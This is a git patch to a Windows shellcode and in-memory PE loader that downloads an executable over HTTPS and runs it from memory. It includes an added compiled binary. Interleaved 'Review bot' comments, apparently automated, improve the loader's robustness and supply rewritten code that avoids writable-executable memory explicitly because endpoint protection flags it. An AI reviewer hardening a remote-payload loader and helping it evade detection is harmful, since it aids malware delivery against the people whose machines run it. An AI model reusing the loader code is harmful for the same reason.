From 793daa06d5c3c9cab818c14014bd6be0ba784128 Mon Sep 17 00:00:00 2001 From: bakabie Date: Fri, 9 Apr 2021 22:52:46 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E5=A4=8D=E5=8A=A0=E8=BD=BD=E5=99=A8?= =?UTF-8?q?=E6=B5=8B=E8=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- RUN_EXE_MT/RmExecute.exe | Bin 0 -> 11264 bytes RmExecute/123.bin | Bin 205 -> 0 bytes RmExecute/Loader.cpp | 8 ++++++-- RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe | 11 ----------- .../RcDllShelcode.vcxproj.FileListAbsolute.txt | 0 RmExecute/RUN_EXE_MT/RmExecute.exe.recipe | 11 ----------- .../RmExecute.vcxproj.FileListAbsolute.txt | 0 RmExecute/RmExecute.vcxproj | 6 +++--- RmExecute/ShellCode.cpp | 9 ++++----- RmExecute/Tool.h | 8 +++----- RmExecute/open.txt | 1 - 11 files changed, 16 insertions(+), 38 deletions(-) create mode 100644 RUN_EXE_MT/RmExecute.exe delete mode 100644 RmExecute/123.bin delete mode 100644 RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe delete mode 100644 RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt delete mode 100644 RmExecute/RUN_EXE_MT/RmExecute.exe.recipe delete mode 100644 RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt delete mode 100644 RmExecute/open.txt 
diff --git a/RUN_EXE_MT/RmExecute.exe b/RUN_EXE_MT/RmExecute.exe new file mode 100644 index 0000000000000000000000000000000000000000..a92f91007046d79414ea3671efe7a703f5c85709 GIT binary patch literal 11264 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 Xy=*mo1CW11o3Q7d7=2j&8a?nIo&*Ac literal 0 HcmV?d00001 diff --git a/RmExecute/123.bin b/RmExecute/123.bin deleted file mode 100644 index b64ecedade75a68befb6273118b9c383bbddd370..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 205 zcmaE9E6l*~vPK<9JeC6zW%5Acs|t`P&;b(8sz73%B#=l2aVr#nL^z0bjSEQp)c_I< zARVhgM3E?vcnH$l10u{p>e4_;7J>}8AOa-TgCvqbieo`60Tv*^4zfcGq?i{(+>rnh qmqALJK(_e`00|dqAhBKvNSsmw5_h$ML=A`=3^HDd9Z0AGy#N5>Sw1%a diff --git a/RmExecute/Loader.cpp b/RmExecute/Loader.cpp index 6982e42..23d337e 100644 --- a/RmExecute/Loader.cpp +++ b/RmExecute/Loader.cpp @@ -86,8 +86,12 @@ void RunShellCode() typedef void(WINAPI* fnFun)( char* ); - - fnFun Shellcode = (fnFun)(filebuf); + PVOID p = NULL; + if ((p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL) + MessageBoxA(NULL, "ÉêÇëÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK); + if (!(memcpy(p, filebuf, filelen))) + MessageBoxA(NULL, "дÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK); + fnFun Shellcode = (fnFun)p; Shellcode(URL); } 
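Review bot: A failed VirtualAlloc on the first added line only pops a message box and then falls through, so `memcpy(p, filebuf, filelen)` runs with p == NULL and the loader crashes instead of reporting; the second check is dead code because memcpy returns its destination pointer, never NULL. The mapping is also created PAGE_EXECUTE_READWRITE although the buffer is written exactly once before it runs: allocate it PAGE_READWRITE, copy, then VirtualProtect to PAGE_EXECUTE_READ and flush the instruction cache, so no page is ever writable and executable at the same time (the W+X mapping is also the first thing most endpoint protections flag). Releasing the mapping after `Shellcode(URL)` returns avoids leaking it for the life of the process. RunShellCode's signature and the definitions of filebuf and filelen are above the hunk, so I am assuming filelen is the byte count of filebuf.
```cpp
	// … unchanged: typedef void(WINAPI* fnFun)( char* ); …
	// Stage the blob in a writable page first and only then make it executable,
	// so no page is ever W+X at the same time.
	PVOID p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (p == NULL) {
		MessageBoxA(NULL, "ÉêÇëÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
		return;                         // never memcpy into a NULL mapping
	}
	memcpy(p, filebuf, filelen);        // cannot fail; its return value is just p
	DWORD oldProt = 0;
	if (!VirtualProtect(p, filelen, PAGE_EXECUTE_READ, &oldProt)) {
		VirtualFree(p, 0, MEM_RELEASE);
		return;
	}
	FlushInstructionCache(GetCurrentProcess(), p, filelen);
	fnFun Shellcode = (fnFun)p;
	Shellcode(URL);
	VirtualFree(p, 0, MEM_RELEASE);     // release the mapping once the blob returns
```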
diff --git a/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe b/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe
deleted file mode 100644
index 7fa831b..0000000
--- a/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
-
-
- C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RcDllShelcode.exe
-
-
-
-
-
-
\ No newline at end of file
diff --git a/RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt b/RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt
deleted file mode 100644
index e69de29..0000000
diff --git a/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe b/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe
deleted file mode 100644
index 03cf3a8..0000000
--- a/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
-
-
- C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RmExecute.exe
-
-
-
-
-
-
\ No newline at end of file
diff --git a/RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt b/RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt
deleted file mode 100644
index e69de29..0000000
diff --git a/RmExecute/RmExecute.vcxproj b/RmExecute/RmExecute.vcxproj
index c46d6fa..cbbaed2 100644
--- a/RmExecute/RmExecute.vcxproj
+++ b/RmExecute/RmExecute.vcxproj
@@ -167,7 +167,7 @@
- _DEBUG
+ _CRT_SECURE_NO_WARNINGS;_DEBUG;_CONSOLE;_LIB
@@ -193,7 +193,7 @@
- false
+ true
 Console true false
@@ -208,7 +208,7 @@
 Level3 true false
- RUNEXEMT;_CRT_SECURE_NO_WARNINGS
+ RUNEXEMT;_CRT_SECURE_NO_WARNINGS;_DEBUG
 MultiThreaded false
diff --git a/RmExecute/ShellCode.cpp b/RmExecute/ShellCode.cpp
index 017fc01..7f7b6b5 100644
--- a/RmExecute/ShellCode.cpp
+++ b/RmExecute/ShellCode.cpp
@@ -2,7 +2,7 @@
 //¼ÓÔØÆðʼº¯Êý£¬Ìøתµ½Èë¿Úº¯Êý
 #ifdef _WIN64
-VOID mmLoaderSCStart(){
+VOID mmLoaderSCStart(){
 Strat();
 #else
 VOID _declspec(naked) mmLoaderSCStart()
@@ -27,7 +27,6 @@ public:
 Functions fn;
- char s_runexe[260];
 char* newbuff;
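Review bot: `_DEBUG` is added by hand to the preprocessor definitions of the configuration whose runtime library is `MultiThreaded` (/MT, the release CRT), as far as the stripped XML tags let me tell from the `@@ -208` hunk. The compiler normally supplies `_DEBUG` only for /MTd and /MDd; defining it against the release CRT makes `<crtdbg.h>` and the heap headers select debug-only entry points that the release CRT does not export, so expect link errors or mismatched behavior rather than a working "test" build. If the goal is just to enable extra diagnostics for the loader test, use a project-specific macro (e.g. `RUNEXEMT;_CRT_SECURE_NO_WARNINGS;RMEXEC_DIAG`) or switch that configuration's runtime to `MultiThreadedDebug`; the same applies to the `_DEBUG;_CONSOLE;_LIB` line in the `@@ -167` hunk if it belongs to a non-debug configuration.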
@@ -38,8 +37,8 @@ public:
 newbuff = NULL;
 Initfunctions(&fn);
- char runexe[] = { 'A', 'A','\0' };
- fn.fnmemcpy(s_runexe, runexe, 260);
+
+
 };
@@ -67,7 +66,7 @@ public:
 int size = HttpDownload(host, path, 443, TRUE);
- fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
+ //fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
 RunPortableExecutable();
diff --git a/RmExecute/Tool.h b/RmExecute/Tool.h
index 0e615d8..d884a8a 100644
--- a/RmExecute/Tool.h
+++ b/RmExecute/Tool.h
@@ -347,7 +347,7 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
 LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
 DWORD op;
 fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
- __try {
+ while (import_table->Name) {
 import_base = fn.fnLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
 fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
@@ -375,10 +375,8 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
 }
 import_table++;
 }
- }
- __except (1) {
-
- }
+
+ return;
 }
diff --git a/RmExecute/open.txt b/RmExecute/open.txt
deleted file mode 100644
index 02cfe0b..0000000
--- a/RmExecute/open.txt
+++ /dev/null
@@ -1 +0,0 @@
-213
\ No newline at end of file
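Review bot: The result of `int size = HttpDownload(host, path, 443, TRUE);` is never examined before `RunPortableExecutable();` in the `@@ -67` hunk, so a failed or empty download still goes on to map and run whatever happens to be in newbuff; HttpDownload's contract is outside this hunk, but a non-positive size is presumably the failure case. Guard it with `if (size <= 0) return;` (or whatever failure value HttpDownload really returns) ahead of the RunPortableExecutable call. Rather than leaving `//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);` commented out, delete the debug line — version control already remembers it. The enclosing method starts and ends outside the hunk.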
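Review bot: `import_base = fn.fnLoadLibraryA(...)` in the `@@ -347` hunk is assigned without a NULL check, and now that the `__try` wrapper is gone a missing import DLL is no longer silently swallowed — presumably the per-thunk resolution further down the loop (outside this hunk) then goes through a NULL module handle. At minimum skip the descriptor on failure, `if (import_base == NULL) { import_table++; continue; }`, and ideally have FixImageIAT report failure to its caller, since the VOID return gives RunPortableExecutable no way to learn that the image is only partially fixed up. The loop also trusts the downloaded image's import directory to be 0-terminated; since the payload comes off the network, bounding the walk by the directory size from nt_header would be cheap insurance. The loop body continues past the hunk, so I cannot see how the resolved addresses are written.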
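Review bot: The IAT is left PAGE_READWRITE after the fix-up: the `@@ -347` hunk changes its protection and saves the old one in `op`, but nothing between the end of the while loop and the added `return;` in the `@@ -375` hunk restores it, so the freshly resolved import table stays writable for the life of the image. Restore it after the loop with `fn.fnVirtualProtect(iat, iat_size, op, &op);` before returning; iat, iat_size and op are all declared in the same function. The bare `return;` at the end of a VOID function is noise — drop it together with the blank line the hunk adds.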